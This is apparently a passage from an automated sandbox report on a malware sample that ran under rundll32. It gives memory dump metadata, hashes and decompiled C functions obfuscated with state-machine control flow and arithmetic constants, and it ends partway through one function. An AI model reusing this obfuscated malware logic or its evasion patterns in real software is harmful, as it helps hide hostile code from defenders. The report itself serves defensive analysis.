                                                                                                                      • Opcode Fuzzy Hash: bce61d6f58c59938f5edc3d8d30744f309a55dbd5b225535f57c780ac642b54b
                                                                                                                      • Instruction Fuzzy Hash: D5F15E7460020ABFDB15EF54C890EAE7BE9EF08350F10852AF925AF291D734ED81DB61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Iconic
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 110040809-0
                                                                                                                      • Opcode ID: c62964fb237a153d00a9d951690d2dc04f1de6fa771c83c35e5bfac844c94462
                                                                                                                      • Instruction ID: 838b9ee9edc54b62b4d2e1430c30368496747ad900502173d0e488298d75c8b4
                                                                                                                      • Opcode Fuzzy Hash: c62964fb237a153d00a9d951690d2dc04f1de6fa771c83c35e5bfac844c94462
                                                                                                                      • Instruction Fuzzy Hash: D6C012B0504208EB8704CB94D940C1977A8E74D30470002CCF80C83300D531AD008655
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E003564F1(intOrPtr* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                      				char _v36;
                                                                                                                      				intOrPtr _v40;
                                                                                                                      				intOrPtr _v44;
                                                                                                                      				intOrPtr _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				void* _t137;
                                                                                                                      				void* _t150;
                                                                                                                      				intOrPtr _t151;
                                                                                                                      				void* _t157;
                                                                                                                      				intOrPtr* _t172;
                                                                                                                      				intOrPtr _t173;
                                                                                                                      				signed int _t174;
                                                                                                                      				signed int _t175;
                                                                                                                      				signed int _t176;
                                                                                                                      				signed int* _t179;
                                                                                                                      
                                                                                                                      				_t155 = _a4;
                                                                                                                      				_push(_a8);
                                                                                                                      				_t172 = __ecx;
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0034CF25(_t137);
                                                                                                                      				_v48 = 0x93d665;
                                                                                                                      				_t179 =  &(( &_v100)[4]);
                                                                                                                      				_t173 = 0;
                                                                                                                      				_v44 = 0;
                                                                                                                      				_t157 = 0x9466795;
                                                                                                                      				_v40 = 0;
                                                                                                                      				_v92 = 0xc35ba1;
                                                                                                                      				_v92 = _v92 + 0xcdf2;
                                                                                                                      				_t174 = 0x24;
                                                                                                                      				_v92 = _v92 / _t174;
                                                                                                                      				_v92 = _v92 ^ 0x5a7ecd09;
                                                                                                                      				_v92 = _v92 ^ 0x5a7bbfe7;
                                                                                                                      				_v56 = 0x6ac612;
                                                                                                                      				_v56 = _v56 ^ 0x41bcc0f7;
                                                                                                                      				_v56 = _v56 + 0xffffadf0;
                                                                                                                      				_v56 = _v56 ^ 0x41d5b4d5;
                                                                                                                      				_v100 = 0xa175c9;
                                                                                                                      				_v100 = _v100 | 0xb7da1d5b;
                                                                                                                      				_v100 = _v100 ^ 0x832b9b3a;
                                                                                                                      				_v100 = _v100 ^ 0xfbd8173c;
                                                                                                                      				_v100 = _v100 ^ 0xcf0e566f;
                                                                                                                      				_v68 = 0xb337e;
                                                                                                                      				_v68 = _v68 >> 0xf;
                                                                                                                      				_v68 = _v68 + 0xffffb10e;
                                                                                                                      				_v68 = _v68 ^ 0xfff97d65;
                                                                                                                      				_v72 = 0x51a563;
                                                                                                                      				_v72 = _v72 | 0x5dd657cd;
                                                                                                                      				_v72 = _v72 >> 0xb;
                                                                                                                      				_v72 = _v72 ^ 0x0003baa1;
                                                                                                                      				_v76 = 0xe50ce8;
                                                                                                                      				_t175 = 0x4f;
                                                                                                                      				_v76 = _v76 / _t175;
                                                                                                                      				_v76 = _v76 | 0x5f70b90d;
                                                                                                                      				_v76 = _v76 ^ 0x5f701ab2;
                                                                                                                      				_v80 = 0xbdb868;
                                                                                                                      				_v80 = _v80 * 0x3f;
                                                                                                                      				_v80 = _v80 + 0x8645;
                                                                                                                      				_v80 = _v80 | 0x0d4f9aa3;
                                                                                                                      				_v80 = _v80 ^ 0x2ff450e8;
                                                                                                                      				_v52 = 0x17e057;
                                                                                                                      				_v52 = _v52 >> 0xc;
                                                                                                                      				_v52 = _v52 ^ 0x00020d27;
                                                                                                                      				_v60 = 0xa13b54;
                                                                                                                      				_v60 = _v60 * 0x33;
                                                                                                                      				_v60 = _v60 ^ 0x49292d47;
                                                                                                                      				_v60 = _v60 ^ 0x693c6a3c;
                                                                                                                      				_v84 = 0xcd99b1;
                                                                                                                      				_v84 = _v84 + 0x2d8d;
                                                                                                                      				_v84 = _v84 << 7;
                                                                                                                      				_v84 = _v84 + 0xffff7b1e;
                                                                                                                      				_v84 = _v84 ^ 0x66e29e95;
                                                                                                                      				_v88 = 0xe50b02;
                                                                                                                      				_v88 = _v88 ^ 0x6ddcea1b;
                                                                                                                      				_v88 = _v88 >> 0x10;
                                                                                                                      				_v88 = _v88 * 0x49;
                                                                                                                      				_v88 = _v88 ^ 0x001db712;
                                                                                                                      				_v64 = 0xb5c75b;
                                                                                                                      				_v64 = _v64 * 0x46;
                                                                                                                      				_t176 = 0x77;
                                                                                                                      				_v64 = _v64 / _t176;
                                                                                                                      				_v64 = _v64 ^ 0x006c56aa;
                                                                                                                      				_v96 = 0xaabe6e;
                                                                                                                      				_v96 = _v96 << 5;
                                                                                                                      				_v96 = _v96 + 0xffff8361;
                                                                                                                      				_v96 = _v96 << 3;
                                                                                                                      				_v96 = _v96 ^ 0xaab2b903;
                                                                                                                      				do {
                                                                                                                      					while(_t157 != 0x179a40a) {
                                                                                                                      						if(_t157 == 0x8ebb7f5) {
                                                                                                                      							_t151 =  *0x365c9c; // 0x0
                                                                                                                      							E0035D6C0(_v80, _v52, _v60, _t157, _v84, _v88,  &_v36, _t157, _v64, _v92, _v96,  *_t155,  *((intOrPtr*)(_t155 + 4)),  *((intOrPtr*)(_t151 + 8)));
                                                                                                                      							_t173 =  ==  ? 1 : _t173;
                                                                                                                      						} else {
                                                                                                                      							if(_t157 != 0x9466795) {
                                                                                                                      								goto L8;
                                                                                                                      							} else {
                                                                                                                      								_t157 = 0x179a40a;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L11:
                                                                                                                      						return _t173;
                                                                                                                      					}
                                                                                                                      					_push( *_t172);
                                                                                                                      					_t150 = E00351831(_v68, _v72,  &_v36, _v76, _t157,  *((intOrPtr*)(_t172 + 4)));
                                                                                                                      					_t179 =  &(_t179[6]);
                                                                                                                      					if(_t150 == 0) {
                                                                                                                      						_t157 = 0x49089dc;
                                                                                                                      						goto L8;
                                                                                                                      					} else {
                                                                                                                      						_t157 = 0x8ebb7f5;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					goto L11;
                                                                                                                      					L8:
                                                                                                                      				} while (_t157 != 0x49089dc);
                                                                                                                      				goto L11;
                                                                                                                      			}






























                                                                                                                      0x00356734
                                                                                                                      0x00356734
                                                                                                                      0x00000000
                                                                                                                      0x00356734
                                                                                                                      0x00000000
                                                                                                                      0x00356740
                                                                                                                      0x00356740
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: <j<i
                                                                                                                      • API String ID: 0-2573498096
                                                                                                                      • Opcode ID: 9e53074713708ff7298afe18d4a1af6f75fb88c97a5962f59a9557456a9e907d
                                                                                                                      • Instruction ID: 114d8d1611347f927e3291a5d92d40314bd6068151c5ce1f0bc2bd6670575f52
                                                                                                                      • Opcode Fuzzy Hash: 9e53074713708ff7298afe18d4a1af6f75fb88c97a5962f59a9557456a9e907d
                                                                                                                      • Instruction Fuzzy Hash: 8A610FB15093419FC754CF25C98A81BFBE6FBC8B58F809A1EF58696220D3719A49CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00354B56() {
                                                                                                                      				char _v524;
                                                                                                                      				signed int _v528;
                                                                                                                      				signed int _v532;
                                                                                                                      				signed int _v536;
                                                                                                                      				signed int _v540;
                                                                                                                      				signed int _v544;
                                                                                                                      				signed int _v548;
                                                                                                                      				signed int _v552;
                                                                                                                      				signed int _v556;
                                                                                                                      				signed int _v560;
                                                                                                                      				signed int _v564;
                                                                                                                      				signed int _t95;
                                                                                                                      				signed int _t101;
                                                                                                                      				signed int _t103;
                                                                                                                      				void* _t104;
                                                                                                                      				signed int _t122;
                                                                                                                      				signed int _t123;
                                                                                                                      				signed int _t124;
                                                                                                                      				void* _t126;
                                                                                                                      				signed int _t127;
                                                                                                                      				signed int* _t128;
                                                                                                                      
                                                                                                                      				_t128 =  &_v564;
                                                                                                                      				_v556 = 0x172e57;
                                                                                                                      				_v556 = _v556 ^ 0x73ef0dea;
                                                                                                                      				_t104 = 0x4d22871;
                                                                                                                      				_v556 = _v556 << 5;
                                                                                                                      				_v556 = _v556 ^ 0x7f0420db;
                                                                                                                      				_v564 = 0x28c43f;
                                                                                                                      				_t122 = 0x37;
                                                                                                                      				_v564 = _v564 / _t122;
                                                                                                                      				_v564 = _v564 ^ 0x0004b302;
                                                                                                                      				_t126 = 0;
                                                                                                                      				_v540 = 0xa3dd1;
                                                                                                                      				_v540 = _v540 >> 7;
                                                                                                                      				_v540 = _v540 ^ 0x000ead4a;
                                                                                                                      				_v548 = 0xb6c83;
                                                                                                                      				_v548 = _v548 >> 2;
                                                                                                                      				_v548 = _v548 ^ 0x000dd0d2;
                                                                                                                      				_v544 = 0xa789eb;
                                                                                                                      				_t123 = 0x5a;
                                                                                                                      				_v544 = _v544 / _t123;
                                                                                                                      				_v544 = _v544 ^ 0x000aafac;
                                                                                                                      				_v532 = 0x6a9d21;
                                                                                                                      				_t124 = 0x13;
                                                                                                                      				_t125 = _v564;
                                                                                                                      				_v532 = _v532 / _t124;
                                                                                                                      				_v532 = _v532 ^ 0x0003d3c1;
                                                                                                                      				_v528 = 0x3996e5;
                                                                                                                      				_v528 = _v528 >> 4;
                                                                                                                      				_v528 = _v528 ^ 0x0009e8d5;
                                                                                                                      				_t103 = _v564;
                                                                                                                      				_t127 = _v564;
                                                                                                                      				_v536 = 0xc5251e;
                                                                                                                      				_v536 = _v536 ^ 0x87fb489f;
                                                                                                                      				_v536 = _v536 ^ 0x87377a50;
                                                                                                                      				_v560 = 0x43b612;
                                                                                                                      				_v560 = _v560 >> 0xe;
                                                                                                                      				_v560 = _v560 ^ 0x7320a641;
                                                                                                                      				_v560 = _v560 ^ 0xd4a0e575;
                                                                                                                      				_v560 = _v560 ^ 0xa78970ff;
                                                                                                                      				_v552 = 0x3a31ae;
                                                                                                                      				_v552 = _v552 ^ 0x0baee347;
                                                                                                                      				_v552 = _v552 ^ 0x0b916be4;
                                                                                                                      				do {
                                                                                                                      					while(_t104 != 0x42ef3b0) {
                                                                                                                      						if(_t104 == 0x4d22871) {
                                                                                                                      							_t104 = 0xc70fe83;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t104 == 0x81a395a) {
                                                                                                                      								_v564 = 0x2f01d9;
                                                                                                                      								_v564 = _v564 + 0xd8f0;
                                                                                                                      								_v564 = _v564 ^ 0x2a08da2b;
                                                                                                                      								__eflags = _t103 - _v564;
                                                                                                                      								_t126 =  ==  ? 1 : _t126;
                                                                                                                      							} else {
                                                                                                                      								if(_t104 == 0x918a316) {
                                                                                                                      									_t103 = E00347677(_t127, _v536, _v560, _v552);
                                                                                                                      									_t104 = 0x81a395a;
                                                                                                                      									continue;
                                                                                                                      								} else {
                                                                                                                      									if(_t104 == 0xc70fe83) {
                                                                                                                      										_t101 = E0034C706();
                                                                                                                      										_t125 = _t101;
                                                                                                                      										__eflags = _t101;
                                                                                                                      										if(__eflags != 0) {
                                                                                                                      											_t104 = 0x42ef3b0;
                                                                                                                      											continue;
                                                                                                                      										}
                                                                                                                      									} else {
                                                                                                                      										if(_t104 != 0xea0747d) {
                                                                                                                      											goto L15;
                                                                                                                      										} else {
                                                                                                                      											_t127 = E00354FA8(_v544,  &_v524, _v532, _v528);
                                                                                                                      											_t104 = 0x918a316;
                                                                                                                      											continue;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L18:
                                                                                                                      						return _t126;
                                                                                                                      					}
                                                                                                                      					_t95 = E00361993(_v564, _v540, __eflags,  &_v524, _t104, _v548, _t125);
                                                                                                                      					_t128 =  &(_t128[4]);
                                                                                                                      					__eflags = _t95;
                                                                                                                      					if(__eflags == 0) {
                                                                                                                      						_t104 = 0xffaf3fd;
                                                                                                                      						goto L15;
                                                                                                                      					} else {
                                                                                                                      						_t104 = 0xea0747d;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					goto L18;
                                                                                                                      					L15:
                                                                                                                      					__eflags = _t104 - 0xffaf3fd;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				goto L18;
                                                                                                                      			}
























                                                                                                                      0x00354d90
                                                                                                                      0x00354d37
                                                                                                                      0x00354d3c
                                                                                                                      0x00354d3f
                                                                                                                      0x00354d41
                                                                                                                      0x00354d4d
                                                                                                                      0x00000000
                                                                                                                      0x00354d43
                                                                                                                      0x00354d43
                                                                                                                      0x00000000
                                                                                                                      0x00354d43
                                                                                                                      0x00000000
                                                                                                                      0x00354d52
                                                                                                                      0x00354d52
                                                                                                                      0x00354d52
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: s
                                                                                                                      • API String ID: 0-1867647943
                                                                                                                      • Opcode ID: 34bd5959cf2d6eb589c4a5b2399f6c39d3f0ab0d666f3f677d61167571982d03
                                                                                                                      • Instruction ID: f2f8b999191811a69e715ff091956c2052072fc3c9551adc1f8e45ff56a98a75
                                                                                                                      • Opcode Fuzzy Hash: 34bd5959cf2d6eb589c4a5b2399f6c39d3f0ab0d666f3f677d61167571982d03
                                                                                                                      • Instruction Fuzzy Hash: 3251BC712093419FC359DE61D59582BBBE1EFC4708F20891EF9969A260C770DA4ACF47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E0034E86A() {
                                                                                                                      				char _v520;
                                                                                                                      				signed int _v524;
                                                                                                                      				signed int _v528;
                                                                                                                      				signed int _v532;
                                                                                                                      				signed int _v536;
                                                                                                                      				signed int _v540;
                                                                                                                      				signed int _v544;
                                                                                                                      				signed int _v548;
                                                                                                                      				signed int _v552;
                                                                                                                      				signed int _v556;
                                                                                                                      				signed int _v560;
                                                                                                                      				signed int _v564;
                                                                                                                      				signed int _t97;
                                                                                                                      				signed int _t99;
                                                                                                                      				intOrPtr _t100;
                                                                                                                      				void* _t105;
                                                                                                                      				signed int _t114;
                                                                                                                      				short* _t117;
                                                                                                                      				signed int* _t119;
                                                                                                                      
                                                                                                                      				_t119 =  &_v564;
                                                                                                                      				_v560 = 0xce5cf0;
                                                                                                                      				_v560 = _v560 | 0x815fac8b;
                                                                                                                      				_t105 = 0x687a68b;
                                                                                                                      				_t114 = 0x3d;
                                                                                                                      				_v560 = _v560 / _t114;
                                                                                                                      				_v560 = _v560 ^ 0x02257571;
                                                                                                                      				_v552 = 0x865242;
                                                                                                                      				_v552 = _v552 * 0x34;
                                                                                                                      				_v552 = _v552 >> 6;
                                                                                                                      				_v552 = _v552 ^ 0x0066bbb6;
                                                                                                                      				_v524 = 0xc32fa5;
                                                                                                                      				_v524 = _v524 * 0x41;
                                                                                                                      				_v524 = _v524 ^ 0x3182565b;
                                                                                                                      				_v548 = 0xb61c38;
                                                                                                                      				_v548 = _v548 * 0x62;
                                                                                                                      				_v548 = _v548 | 0xd3f7f889;
                                                                                                                      				_v548 = _v548 ^ 0xd7f1c5f5;
                                                                                                                      				_v536 = 0xb1408a;
                                                                                                                      				_v536 = _v536 >> 3;
                                                                                                                      				_v536 = _v536 ^ 0x001ed817;
                                                                                                                      				_v556 = 0x4c3333;
                                                                                                                      				_v556 = _v556 + 0xffff679f;
                                                                                                                      				_v556 = _v556 >> 0xf;
                                                                                                                      				_v556 = _v556 ^ 0x000b6621;
                                                                                                                      				_v528 = 0x174ea7;
                                                                                                                      				_v528 = _v528 >> 8;
                                                                                                                      				_v528 = _v528 ^ 0x00085e65;
                                                                                                                      				_v540 = 0x951329;
                                                                                                                      				_v540 = _v540 ^ 0x02360ba7;
                                                                                                                      				_v540 = _v540 ^ 0x02aaf891;
                                                                                                                      				_v564 = 0x7a8127;
                                                                                                                      				_v564 = _v564 | 0x4a3ea7d2;
                                                                                                                      				_v564 = _v564 * 0x6d;
                                                                                                                      				_v564 = _v564 + 0xffffd056;
                                                                                                                      				_v564 = _v564 ^ 0xb7eba97a;
                                                                                                                      				_v532 = 0x65650b;
                                                                                                                      				_t97 = _v532 * 5;
                                                                                                                      				_v532 = _t97;
                                                                                                                      				_v532 = _v532 ^ 0x01f4ff6f;
                                                                                                                      				do {
                                                                                                                      					while(_t105 != 0xb436d6) {
                                                                                                                      						if(_t105 == 0x2c7b739) {
                                                                                                                      							_t100 =  *0x36520c; // 0x0
                                                                                                                      							__eflags = _t100 + 0x220;
                                                                                                                      							return E003508A0(_t117, _v540, _v564, _t100 + 0x220, _v532);
                                                                                                                      						}
                                                                                                                      						if(_t105 == 0x687a68b) {
                                                                                                                      							_t105 = 0xdf97892;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						_t125 = _t105 - 0xdf97892;
                                                                                                                      						if(_t105 != 0xdf97892) {
                                                                                                                      							goto L15;
                                                                                                                      						}
                                                                                                                      						_t97 = E003612A8(_t105, _v560, _t125, _v552, _v524,  &_v520);
                                                                                                                      						_t119 =  &(_t119[3]);
                                                                                                                      						_t105 = 0xb436d6;
                                                                                                                      					}
                                                                                                                      					_v544 = 0xaf74ff;
                                                                                                                      					_v544 = _v544 + 0xc134;
                                                                                                                      					_v544 = _v544 ^ 0x00b03631;
                                                                                                                      					_t99 = E0035BA68(_v548, _v536, _v556,  &_v520, _v528);
                                                                                                                      					_t119 =  &(_t119[3]);
                                                                                                                      					_t117 =  &_v520 + _t99 * 2;
                                                                                                                      					while(1) {
                                                                                                                      						_t97 =  &_v520;
                                                                                                                      						__eflags = _t117 - _t97;
                                                                                                                      						if(_t117 <= _t97) {
                                                                                                                      							break;
                                                                                                                      						}
                                                                                                                      						__eflags =  *_t117 - 0x5c;
                                                                                                                      						if( *_t117 != 0x5c) {
                                                                                                                      							L10:
                                                                                                                      							_t117 = _t117 - 2;
                                                                                                                      							__eflags = _t117;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						_t85 =  &_v544;
                                                                                                                      						 *_t85 = _v544 - 1;
                                                                                                                      						__eflags =  *_t85;
                                                                                                                      						if( *_t85 == 0) {
                                                                                                                      							__eflags = _t117;
                                                                                                                      							L14:
                                                                                                                      							_t105 = 0x2c7b739;
                                                                                                                      							goto L15;
                                                                                                                      						}
                                                                                                                      						goto L10;
                                                                                                                      					}
                                                                                                                      					goto L14;
                                                                                                                      					L15:
                                                                                                                      					__eflags = _t105 - 0x787a9f3;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				return _t97;
                                                                                                                      			}






















                                                                                                                      0x0034ea29
                                                                                                                      0x0034ea2d
                                                                                                                      0x0034ea3c
                                                                                                                      0x0034ea3f
                                                                                                                      0x0034ea3f
                                                                                                                      0x00000000
                                                                                                                      0x0034ea3f
                                                                                                                      0x00000000
                                                                                                                      0x0034ea2d
                                                                                                                      0x00000000
                                                                                                                      0x0034ea41
                                                                                                                      0x0034ea41
                                                                                                                      0x0034ea41
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 33L
                                                                                                                      • API String ID: 0-1382935120
                                                                                                                      • Opcode ID: 04fc891c52c6a98fabd3b9d31d1bf0e54bbcd4cbf9786134227aa9e61012b2d2
                                                                                                                      • Instruction ID: fae5ea8181e05d790cd814122708000ccdf45c72a936faa5ac843e6d0bc37f3a
                                                                                                                      • Opcode Fuzzy Hash: 04fc891c52c6a98fabd3b9d31d1bf0e54bbcd4cbf9786134227aa9e61012b2d2
                                                                                                                      • Instruction Fuzzy Hash: E75154715083819BC798CF24C58582FBBE4FBC4758F904A1DF9869A260D374EA49CF82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E00350D33(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr* _a12) {
                                                                                                                      				signed int _v4;
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				void* _t64;
                                                                                                                      				void* _t81;
                                                                                                                      				void* _t85;
                                                                                                                      				signed int _t94;
                                                                                                                      				signed int _t95;
                                                                                                                      				void* _t97;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0034CF25(_t64);
                                                                                                                      				_v20 = 0xc35745;
                                                                                                                      				_t97 = 0;
                                                                                                                      				_t81 = 0xe709e41;
                                                                                                                      				_t94 = 0x4c;
                                                                                                                      				_v20 = _v20 / _t94;
                                                                                                                      				_v20 = _v20 ^ 0x00058dee;
                                                                                                                      				_v24 = 0xf1d8fd;
                                                                                                                      				_v24 = _v24 + 0xffffe7cd;
                                                                                                                      				_v24 = _v24 + 0xffff1b1a;
                                                                                                                      				_v24 = _v24 << 0xc;
                                                                                                                      				_v24 = _v24 ^ 0x0dbd879b;
                                                                                                                      				_v28 = 0xdb2a24;
                                                                                                                      				_v28 = _v28 + 0x4b2b;
                                                                                                                      				_v28 = _v28 | 0xa0f26509;
                                                                                                                      				_v28 = _v28 + 0x79c0;
                                                                                                                      				_v28 = _v28 ^ 0xa0fe0b2f;
                                                                                                                      				_v4 = 0xb750f2;
                                                                                                                      				_v4 = _v4 >> 0xe;
                                                                                                                      				_v4 = _v4 ^ 0x000727f7;
                                                                                                                      				_v8 = 0x72e718;
                                                                                                                      				_t95 = 0x6b;
                                                                                                                      				_v8 = _v8 / _t95;
                                                                                                                      				_v8 = _v8 ^ 0x00056d3a;
                                                                                                                      				_v12 = 0x47eeb9;
                                                                                                                      				_v12 = _v12 + 0xffffe987;
                                                                                                                      				_v12 = _v12 ^ 0x0043781c;
                                                                                                                      				_v16 = 0xdf1994;
                                                                                                                      				_v16 = _v16 + 0xffff4376;
                                                                                                                      				_v16 = _v16 ^ 0x00d54791;
                                                                                                                      				do {
                                                                                                                      					while(_t81 != 0x3b92be8) {
                                                                                                                      						if(_t81 == 0x73b901c) {
                                                                                                                      							E00363672();
                                                                                                                      							_t81 = 0xe212545;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t81 == 0x9bcb632) {
                                                                                                                      								if(E0035ACD3(_a8) != 0) {
                                                                                                                      									_t97 = 1;
                                                                                                                      								} else {
                                                                                                                      									_t81 = 0x73b901c;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								if(_t81 == 0xe212545) {
                                                                                                                      									E003468DE(_v4, _v8, _v12, _v16,  *0x365c9c);
                                                                                                                      								} else {
                                                                                                                      									if(_t81 != 0xe709e41) {
                                                                                                                      										goto L13;
                                                                                                                      									} else {
                                                                                                                      										_push(_t81);
                                                                                                                      										_push(_t81);
                                                                                                                      										_t85 = 0x60;
                                                                                                                      										 *0x365c9c = E00353512(_t85);
                                                                                                                      										_t81 = 0x3b92be8;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L17:
                                                                                                                      						return _t97;
                                                                                                                      					}
                                                                                                                      					if(E00349A7D(_a12) == 0) {
                                                                                                                      						_t81 = 0xe212545;
                                                                                                                      						goto L13;
                                                                                                                      					} else {
                                                                                                                      						_t81 = 0x9bcb632;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					goto L17;
                                                                                                                      					L13:
                                                                                                                      				} while (_t81 != 0xf0e3ed);
                                                                                                                      				goto L17;
                                                                                                                      			}

















                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: +K
                                                                                                                      • API String ID: 0-3601299342
                                                                                                                      • Opcode ID: 3f35a3fb25c55c75c9da133932055431c71371d10b7b97cadb19e54cb265a978
                                                                                                                      • Instruction ID: 38cc0d8babed43d427723e2270f9f68f687f7e020f543a68e9ac46f4e2a15817
                                                                                                                      • Opcode Fuzzy Hash: 3f35a3fb25c55c75c9da133932055431c71371d10b7b97cadb19e54cb265a978
                                                                                                                      • Instruction Fuzzy Hash: 7741E072608701DBC759CF20C84692FBBE1EBD8318F608E1DF9925A270D772D909CB46
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 89%
                                                                                                                      			E0034AB66(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                      				void* _t42;
                                                                                                                      				signed int _t46;
                                                                                                                      				short* _t63;
                                                                                                                      				signed int _t64;
                                                                                                                      				signed int _t66;
                                                                                                                      				signed int _t74;
                                                                                                                      				unsigned int _t75;
                                                                                                                      				unsigned int _t76;
                                                                                                                      				short* _t79;
                                                                                                                      				signed int* _t80;
                                                                                                                      				signed int* _t81;
                                                                                                                      				signed int* _t82;
                                                                                                                      				unsigned int _t84;
                                                                                                                      				void* _t90;
                                                                                                                      				short _t92;
                                                                                                                      				void* _t94;
                                                                                                                      				void* _t95;
                                                                                                                      
                                                                                                                      				_t82 =  *(_t94 + 0x1c);
                                                                                                                      				_push( *(_t94 + 0x28));
                                                                                                                      				_push( *(_t94 + 0x28));
                                                                                                                      				_push(_t82);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0034CF25(_t42);
                                                                                                                      				 *(_t94 + 0x24) = 0xc8fa9a;
                                                                                                                      				_t80 =  &(_t82[1]);
